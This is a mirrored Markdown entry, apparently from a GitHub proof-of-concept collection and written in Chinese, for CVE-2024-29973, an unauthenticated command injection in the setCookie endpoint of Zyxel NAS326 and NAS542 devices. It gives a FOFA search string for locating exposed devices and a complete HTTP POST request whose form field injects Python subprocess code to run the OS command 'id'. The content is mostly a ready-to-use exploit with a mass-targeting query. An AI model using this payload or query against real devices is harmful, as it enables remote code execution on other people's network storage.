mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
29 lines
1.1 KiB
Markdown
29 lines
1.1 KiB
Markdown
## Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973)
|
||
|
||
Zyxel NAS326 V5.21(AAZF.17)C0之前版本、NAS542 V5.21(ABAG.14)C0之前版本存在操作系统命令注入漏洞,该漏洞源于setCookie参数中存在命令注入漏洞,从而导致未经身份验证的远程攻击者可通过HTTP POST请求来执行某些操作系统 (OS) 命令。
|
||
|
||
## fofa
|
||
|
||
```
|
||
body="/cmd,/ck6fup6/user_grp_cgi/cgi_modify_userinfo"
|
||
```
|
||
|
||
## poc
|
||
|
||
```
|
||
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
|
||
Host: your-ip
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
||
Accept: */*
|
||
Accept-Language: en-US,en;q=0.5
|
||
Accept-Encoding: gzip, deflate
|
||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6
|
||
|
||
------WebKitFormBoundaryHHaZAYecVOf5sfa6
|
||
Content-Disposition: form-data; name="c0"
|
||
|
||
storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#
|
||
------WebKitFormBoundaryHHaZAYecVOf5sfa6--
|
||
```
|
||
|
||
 |